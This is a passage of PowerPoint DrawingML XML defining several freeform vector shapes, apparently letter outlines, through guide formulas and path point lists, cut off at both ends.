                  <a:gd name="T38" fmla="*/ 0 w 150"/>
                  <a:gd name="T39" fmla="*/ 53 h 178"/>
                  <a:gd name="T40" fmla="*/ 18 w 150"/>
                  <a:gd name="T41" fmla="*/ 27 h 178"/>
                  <a:gd name="T42" fmla="*/ 44 w 150"/>
                  <a:gd name="T43" fmla="*/ 0 h 178"/>
                  <a:gd name="T44" fmla="*/ 80 w 150"/>
                  <a:gd name="T45" fmla="*/ 0 h 178"/>
                  <a:gd name="T46" fmla="*/ 80 w 150"/>
                  <a:gd name="T47" fmla="*/ 0 h 178"/>
                  <a:gd name="T48" fmla="*/ 114 w 150"/>
                  <a:gd name="T49" fmla="*/ 0 h 178"/>
                  <a:gd name="T50" fmla="*/ 131 w 150"/>
                  <a:gd name="T51" fmla="*/ 27 h 178"/>
                  <a:gd name="T52" fmla="*/ 140 w 150"/>
                  <a:gd name="T53" fmla="*/ 53 h 178"/>
                  <a:gd name="T54" fmla="*/ 149 w 150"/>
                  <a:gd name="T55" fmla="*/ 80 h 178"/>
                  <a:gd name="T56" fmla="*/ 149 w 150"/>
                  <a:gd name="T57" fmla="*/ 80 h 178"/>
                  <a:gd name="T58" fmla="*/ 149 w 150"/>
                  <a:gd name="T59" fmla="*/ 88 h 178"/>
                  <a:gd name="T60" fmla="*/ 27 w 150"/>
                  <a:gd name="T61" fmla="*/ 88 h 178"/>
                  <a:gd name="T62" fmla="*/ 114 w 150"/>
                  <a:gd name="T63" fmla="*/ 71 h 178"/>
                  <a:gd name="T64" fmla="*/ 114 w 150"/>
                  <a:gd name="T65" fmla="*/ 71 h 178"/>
                  <a:gd name="T66" fmla="*/ 114 w 150"/>
                  <a:gd name="T67" fmla="*/ 53 h 178"/>
                  <a:gd name="T68" fmla="*/ 106 w 150"/>
                  <a:gd name="T69" fmla="*/ 35 h 178"/>
                  <a:gd name="T70" fmla="*/ 97 w 150"/>
                  <a:gd name="T71" fmla="*/ 27 h 178"/>
                  <a:gd name="T72" fmla="*/ 80 w 150"/>
                  <a:gd name="T73" fmla="*/ 18 h 178"/>
                  <a:gd name="T74" fmla="*/ 80 w 150"/>
                  <a:gd name="T75" fmla="*/ 18 h 178"/>
                  <a:gd name="T76" fmla="*/ 53 w 150"/>
                  <a:gd name="T77" fmla="*/ 27 h 178"/>
                  <a:gd name="T78" fmla="*/ 44 w 150"/>
                  <a:gd name="T79" fmla="*/ 35 h 178"/>
                  <a:gd name="T80" fmla="*/ 35 w 150"/>
                  <a:gd name="T81" fmla="*/ 53 h 178"/>
                  <a:gd name="T82" fmla="*/ 27 w 150"/>
                  <a:gd name="T83" fmla="*/ 71 h 178"/>
                  <a:gd name="T84" fmla="*/ 114 w 150"/>
                  <a:gd name="T85" fmla="*/ 71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50" h="178">
                    <a:moveTo>
                      <a:pt x="27" y="88"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="88"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="114" y="71"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="114" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="71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7" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5065713" y="3854450"/>
                <a:ext cx="47625" cy="63500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 132 w 133"/>
                  <a:gd name="T1" fmla="*/ 168 h 178"/>
                  <a:gd name="T2" fmla="*/ 132 w 133"/>
                  <a:gd name="T3" fmla="*/ 168 h 178"/>
                  <a:gd name="T4" fmla="*/ 114 w 133"/>
                  <a:gd name="T5" fmla="*/ 168 h 178"/>
                  <a:gd name="T6" fmla="*/ 79 w 133"/>
                  <a:gd name="T7" fmla="*/ 177 h 178"/>
                  <a:gd name="T8" fmla="*/ 79 w 133"/>
                  <a:gd name="T9" fmla="*/ 177 h 178"/>
                  <a:gd name="T10" fmla="*/ 44 w 133"/>
                  <a:gd name="T11" fmla="*/ 168 h 178"/>
                  <a:gd name="T12" fmla="*/ 17 w 133"/>
                  <a:gd name="T13" fmla="*/ 150 h 178"/>
                  <a:gd name="T14" fmla="*/ 0 w 133"/>
                  <a:gd name="T15" fmla="*/ 124 h 178"/>
                  <a:gd name="T16" fmla="*/ 0 w 133"/>
                  <a:gd name="T17" fmla="*/ 88 h 178"/>
                  <a:gd name="T18" fmla="*/ 0 w 133"/>
                  <a:gd name="T19" fmla="*/ 88 h 178"/>
                  <a:gd name="T20" fmla="*/ 8 w 133"/>
                  <a:gd name="T21" fmla="*/ 53 h 178"/>
                  <a:gd name="T22" fmla="*/ 26 w 133"/>
                  <a:gd name="T23" fmla="*/ 18 h 178"/>
                  <a:gd name="T24" fmla="*/ 53 w 133"/>
                  <a:gd name="T25" fmla="*/ 0 h 178"/>
                  <a:gd name="T26" fmla="*/ 88 w 133"/>
                  <a:gd name="T27" fmla="*/ 0 h 178"/>
                  <a:gd name="T28" fmla="*/ 88 w 133"/>
                  <a:gd name="T29" fmla="*/ 0 h 178"/>
                  <a:gd name="T30" fmla="*/ 114 w 133"/>
                  <a:gd name="T31" fmla="*/ 0 h 178"/>
                  <a:gd name="T32" fmla="*/ 132 w 133"/>
                  <a:gd name="T33" fmla="*/ 9 h 178"/>
                  <a:gd name="T34" fmla="*/ 123 w 133"/>
                  <a:gd name="T35" fmla="*/ 27 h 178"/>
                  <a:gd name="T36" fmla="*/ 123 w 133"/>
                  <a:gd name="T37" fmla="*/ 27 h 178"/>
                  <a:gd name="T38" fmla="*/ 114 w 133"/>
                  <a:gd name="T39" fmla="*/ 27 h 178"/>
                  <a:gd name="T40" fmla="*/ 88 w 133"/>
                  <a:gd name="T41" fmla="*/ 18 h 178"/>
                  <a:gd name="T42" fmla="*/ 88 w 133"/>
                  <a:gd name="T43" fmla="*/ 18 h 178"/>
                  <a:gd name="T44" fmla="*/ 61 w 133"/>
                  <a:gd name="T45" fmla="*/ 27 h 178"/>
                  <a:gd name="T46" fmla="*/ 44 w 133"/>
                  <a:gd name="T47" fmla="*/ 35 h 178"/>
                  <a:gd name="T48" fmla="*/ 35 w 133"/>
                  <a:gd name="T49" fmla="*/ 62 h 178"/>
                  <a:gd name="T50" fmla="*/ 26 w 133"/>
                  <a:gd name="T51" fmla="*/ 88 h 178"/>
                  <a:gd name="T52" fmla="*/ 26 w 133"/>
                  <a:gd name="T53" fmla="*/ 88 h 178"/>
                  <a:gd name="T54" fmla="*/ 35 w 133"/>
                  <a:gd name="T55" fmla="*/ 115 h 178"/>
                  <a:gd name="T56" fmla="*/ 44 w 133"/>
                  <a:gd name="T57" fmla="*/ 133 h 178"/>
                  <a:gd name="T58" fmla="*/ 61 w 133"/>
                  <a:gd name="T59" fmla="*/ 141 h 178"/>
                  <a:gd name="T60" fmla="*/ 88 w 133"/>
                  <a:gd name="T61" fmla="*/ 150 h 178"/>
                  <a:gd name="T62" fmla="*/ 88 w 133"/>
                  <a:gd name="T63" fmla="*/ 150 h 178"/>
                  <a:gd name="T64" fmla="*/ 114 w 133"/>
                  <a:gd name="T65" fmla="*/ 150 h 178"/>
                  <a:gd name="T66" fmla="*/ 123 w 133"/>
                  <a:gd name="T67" fmla="*/ 141 h 178"/>
                  <a:gd name="T68" fmla="*/ 132 w 133"/>
                  <a:gd name="T69" fmla="*/ 168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33" h="178">
                    <a:moveTo>
                      <a:pt x="132" y="168"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="132" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="168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8" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5119688" y="3835400"/>
                <a:ext cx="38100" cy="82550"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 107"/>
                  <a:gd name="T1" fmla="*/ 0 h 231"/>
                  <a:gd name="T2" fmla="*/ 62 w 107"/>
                  <a:gd name="T3" fmla="*/ 53 h 231"/>
                  <a:gd name="T4" fmla="*/ 106 w 107"/>
                  <a:gd name="T5" fmla="*/ 53 h 231"/>
                  <a:gd name="T6" fmla="*/ 106 w 107"/>
                  <a:gd name="T7" fmla="*/ 80 h 231"/>
                  <a:gd name="T8" fmla="*/ 62 w 107"/>
                  <a:gd name="T9" fmla="*/ 80 h 231"/>
                  <a:gd name="T10" fmla="*/ 62 w 107"/>
                  <a:gd name="T11" fmla="*/ 168 h 231"/>
                  <a:gd name="T12" fmla="*/ 62 w 107"/>
                  <a:gd name="T13" fmla="*/ 168 h 231"/>
                  <a:gd name="T14" fmla="*/ 62 w 107"/>
                  <a:gd name="T15" fmla="*/ 194 h 231"/>
                  <a:gd name="T16" fmla="*/ 70 w 107"/>
                  <a:gd name="T17" fmla="*/ 203 h 231"/>
                  <a:gd name="T18" fmla="*/ 79 w 107"/>
                  <a:gd name="T19" fmla="*/ 203 h 231"/>
                  <a:gd name="T20" fmla="*/ 79 w 107"/>
                  <a:gd name="T21" fmla="*/ 203 h 231"/>
                  <a:gd name="T22" fmla="*/ 106 w 107"/>
                  <a:gd name="T23" fmla="*/ 203 h 231"/>
                  <a:gd name="T24" fmla="*/ 106 w 107"/>
                  <a:gd name="T25" fmla="*/ 221 h 231"/>
                  <a:gd name="T26" fmla="*/ 106 w 107"/>
                  <a:gd name="T27" fmla="*/ 221 h 231"/>
                  <a:gd name="T28" fmla="*/ 79 w 107"/>
                  <a:gd name="T29" fmla="*/ 230 h 231"/>
                  <a:gd name="T30" fmla="*/ 79 w 107"/>
                  <a:gd name="T31" fmla="*/ 230 h 231"/>
                  <a:gd name="T32" fmla="*/ 53 w 107"/>
                  <a:gd name="T33" fmla="*/ 221 h 231"/>
                  <a:gd name="T34" fmla="*/ 44 w 107"/>
                  <a:gd name="T35" fmla="*/ 212 h 231"/>
                  <a:gd name="T36" fmla="*/ 44 w 107"/>
                  <a:gd name="T37" fmla="*/ 212 h 231"/>
                  <a:gd name="T38" fmla="*/ 35 w 107"/>
                  <a:gd name="T39" fmla="*/ 194 h 231"/>
                  <a:gd name="T40" fmla="*/ 26 w 107"/>
                  <a:gd name="T41" fmla="*/ 168 h 231"/>
                  <a:gd name="T42" fmla="*/ 26 w 107"/>
                  <a:gd name="T43" fmla="*/ 80 h 231"/>
                  <a:gd name="T44" fmla="*/ 0 w 107"/>
                  <a:gd name="T45" fmla="*/ 80 h 231"/>
                  <a:gd name="T46" fmla="*/ 0 w 107"/>
                  <a:gd name="T47" fmla="*/ 53 h 231"/>
                  <a:gd name="T48" fmla="*/ 26 w 107"/>
                  <a:gd name="T49" fmla="*/ 53 h 231"/>
                  <a:gd name="T50" fmla="*/ 26 w 107"/>
                  <a:gd name="T51" fmla="*/ 9 h 231"/>
                  <a:gd name="T52" fmla="*/ 62 w 107"/>
                  <a:gd name="T53" fmla="*/ 0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07" h="231">
                    <a:moveTo>
                      <a:pt x="62" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="62" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62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9" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5164138" y="3854450"/>
                <a:ext cx="60325" cy="63500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 168 w 169"/>
                  <a:gd name="T1" fmla="*/ 88 h 178"/>
                  <a:gd name="T2" fmla="*/ 168 w 169"/>
                  <a:gd name="T3" fmla="*/ 88 h 178"/>
                  <a:gd name="T4" fmla="*/ 159 w 169"/>
                  <a:gd name="T5" fmla="*/ 124 h 178"/>
                  <a:gd name="T6" fmla="*/ 142 w 169"/>
                  <a:gd name="T7" fmla="*/ 150 h 178"/>
                  <a:gd name="T8" fmla="*/ 115 w 169"/>
                  <a:gd name="T9" fmla="*/ 168 h 178"/>
                  <a:gd name="T10" fmla="*/ 80 w 169"/>
                  <a:gd name="T11" fmla="*/ 177 h 178"/>
                  <a:gd name="T12" fmla="*/ 80 w 169"/>
                  <a:gd name="T13" fmla="*/ 177 h 178"/>
                  <a:gd name="T14" fmla="*/ 53 w 169"/>
                  <a:gd name="T15" fmla="*/ 168 h 178"/>
                  <a:gd name="T16" fmla="*/ 27 w 169"/>
                  <a:gd name="T17" fmla="*/ 150 h 178"/>
                  <a:gd name="T18" fmla="*/ 9 w 169"/>
                  <a:gd name="T19" fmla="*/ 124 h 178"/>
                  <a:gd name="T20" fmla="*/ 0 w 169"/>
                  <a:gd name="T21" fmla="*/ 88 h 178"/>
                  <a:gd name="T22" fmla="*/ 0 w 169"/>
                  <a:gd name="T23" fmla="*/ 88 h 178"/>
                  <a:gd name="T24" fmla="*/ 9 w 169"/>
                  <a:gd name="T25" fmla="*/ 44 h 178"/>
                  <a:gd name="T26" fmla="*/ 27 w 169"/>
                  <a:gd name="T27" fmla="*/ 18 h 178"/>
                  <a:gd name="T28" fmla="*/ 53 w 169"/>
                  <a:gd name="T29" fmla="*/ 0 h 178"/>
                  <a:gd name="T30" fmla="*/ 89 w 169"/>
                  <a:gd name="T31" fmla="*/ 0 h 178"/>
                  <a:gd name="T32" fmla="*/ 89 w 169"/>
                  <a:gd name="T33" fmla="*/ 0 h 178"/>
                  <a:gd name="T34" fmla="*/ 124 w 169"/>
                  <a:gd name="T35" fmla="*/ 0 h 178"/>
                  <a:gd name="T36" fmla="*/ 150 w 169"/>
                  <a:gd name="T37" fmla="*/ 18 h 178"/>
                  <a:gd name="T38" fmla="*/ 159 w 169"/>
                  <a:gd name="T39" fmla="*/ 44 h 178"/>
                  <a:gd name="T40" fmla="*/ 168 w 169"/>
                  <a:gd name="T41" fmla="*/ 88 h 178"/>
                  <a:gd name="T42" fmla="*/ 36 w 169"/>
                  <a:gd name="T43" fmla="*/ 88 h 178"/>
                  <a:gd name="T44" fmla="*/ 36 w 169"/>
                  <a:gd name="T45" fmla="*/ 88 h 178"/>
                  <a:gd name="T46" fmla="*/ 36 w 169"/>
                  <a:gd name="T47" fmla="*/ 106 h 178"/>
                  <a:gd name="T48" fmla="*/ 44 w 169"/>
                  <a:gd name="T49" fmla="*/ 133 h 178"/>
                  <a:gd name="T50" fmla="*/ 62 w 169"/>
                  <a:gd name="T51" fmla="*/ 141 h 178"/>
                  <a:gd name="T52" fmla="*/ 89 w 169"/>
                  <a:gd name="T53" fmla="*/ 150 h 178"/>
                  <a:gd name="T54" fmla="*/ 89 w 169"/>
                  <a:gd name="T55" fmla="*/ 150 h 178"/>
                  <a:gd name="T56" fmla="*/ 106 w 169"/>
                  <a:gd name="T57" fmla="*/ 141 h 178"/>
                  <a:gd name="T58" fmla="*/ 124 w 169"/>
                  <a:gd name="T59" fmla="*/ 133 h 178"/>
                  <a:gd name="T60" fmla="*/ 133 w 169"/>
                  <a:gd name="T61" fmla="*/ 106 h 178"/>
                  <a:gd name="T62" fmla="*/ 142 w 169"/>
                  <a:gd name="T63" fmla="*/ 88 h 178"/>
                  <a:gd name="T64" fmla="*/ 142 w 169"/>
                  <a:gd name="T65" fmla="*/ 88 h 178"/>
                  <a:gd name="T66" fmla="*/ 133 w 169"/>
                  <a:gd name="T67" fmla="*/ 62 h 178"/>
                  <a:gd name="T68" fmla="*/ 124 w 169"/>
                  <a:gd name="T69" fmla="*/ 44 h 178"/>
                  <a:gd name="T70" fmla="*/ 106 w 169"/>
                  <a:gd name="T71" fmla="*/ 27 h 178"/>
                  <a:gd name="T72" fmla="*/ 89 w 169"/>
                  <a:gd name="T73" fmla="*/ 18 h 178"/>
                  <a:gd name="T74" fmla="*/ 89 w 169"/>
                  <a:gd name="T75" fmla="*/ 18 h 178"/>
                  <a:gd name="T76" fmla="*/ 62 w 169"/>
                  <a:gd name="T77" fmla="*/ 27 h 178"/>
                  <a:gd name="T78" fmla="*/ 44 w 169"/>
                  <a:gd name="T79" fmla="*/ 44 h 178"/>
                  <a:gd name="T80" fmla="*/ 36 w 169"/>
                  <a:gd name="T81" fmla="*/ 62 h 178"/>
                  <a:gd name="T82" fmla="*/ 36 w 169"/>
                  <a:gd name="T83" fmla="*/ 88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69" h="178">
                    <a:moveTo>
                      <a:pt x="168" y="88"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="88"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="36" y="88"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="36" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="88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0" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5237163" y="3854450"/>
                <a:ext cx="31750" cy="60325"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 90"/>
                  <a:gd name="T1" fmla="*/ 53 h 169"/>
                  <a:gd name="T2" fmla="*/ 9 w 90"/>
                  <a:gd name="T3" fmla="*/ 53 h 169"/>
                  <a:gd name="T4" fmla="*/ 0 w 90"/>
                  <a:gd name="T5" fmla="*/ 0 h 169"/>
                  <a:gd name="T6" fmla="*/ 27 w 90"/>
                  <a:gd name="T7" fmla="*/ 0 h 169"/>
                  <a:gd name="T8" fmla="*/ 36 w 90"/>
                  <a:gd name="T9" fmla="*/ 35 h 169"/>
                  <a:gd name="T10" fmla="*/ 36 w 90"/>
                  <a:gd name="T11" fmla="*/ 35 h 169"/>
                  <a:gd name="T12" fmla="*/ 36 w 90"/>
                  <a:gd name="T13" fmla="*/ 35 h 169"/>
                  <a:gd name="T14" fmla="*/ 53 w 90"/>
                  <a:gd name="T15" fmla="*/ 9 h 169"/>
                  <a:gd name="T16" fmla="*/ 80 w 90"/>
                  <a:gd name="T17" fmla="*/ 0 h 169"/>
                  <a:gd name="T18" fmla="*/ 80 w 90"/>
                  <a:gd name="T19" fmla="*/ 0 h 169"/>
                  <a:gd name="T20" fmla="*/ 89 w 90"/>
                  <a:gd name="T21" fmla="*/ 0 h 169"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 27 h 169"/>
                  <a:gd name="T24" fmla="*/ 89 w 90"/>
                  <a:gd name="T25" fmla="*/ 27 h 169"/>
                  <a:gd name="T26" fmla="*/ 80 w 90"/>
                  <a:gd name="T27" fmla="*/ 27 h 169"/>
                  <a:gd name="T28" fmla="*/ 80 w 90"/>
                  <a:gd name="T29" fmla="*/ 27 h 169"/>
                  <a:gd name="T30" fmla="*/ 62 w 90"/>
                  <a:gd name="T31" fmla="*/ 27 h 169"/>
                  <a:gd name="T32" fmla="*/ 53 w 90"/>
